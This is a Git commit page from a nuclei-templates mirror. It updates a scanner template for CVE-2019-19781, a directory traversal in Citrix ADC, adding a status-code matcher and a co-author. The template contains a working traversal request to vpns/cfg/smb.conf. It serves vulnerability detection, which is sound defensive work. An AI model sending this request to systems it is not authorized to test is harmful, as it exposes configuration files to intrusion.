daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #3717 from geeknik/patch-27 

Update CVE-2019-19781.yaml
patch-1
Prince Chaddha 2022-02-17 00:57:23 +05:30 committed by GitHub
parent 2af991eaac de0969755f
commit 444640832b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
cves/2019/CVE-2019-19781.yaml
View File

@ -2,22 +2,28 @@ id: CVE-2019-19781
info: info:
name: Citrix ADC Directory Traversal name: Citrix ADC Directory Traversal
author: organiccrap author: organiccrap,geeknik
severity: critical severity: critical
description: An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal. description: An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.
reference: https://support.citrix.com/article/CTX267027 reference: https://support.citrix.com/article/CTX267027
tags: cve,cve2019,citrix,lfi
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80 cvss-score: 9.80
cve-id: CVE-2019-19781 cve-id: CVE-2019-19781
cwe-id: CWE-22 cwe-id: CWE-22
tags: cve,cve2019,citrix,lfi
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/vpn/../vpns/cfg/smb.conf" - "{{BaseURL}}/vpn/../vpns/cfg/smb.conf"
matchers-condition: and
matchers: matchers:
- type: status
status:
- 200
- type: word - type: word
words: words:
- "[global]" - "[global]"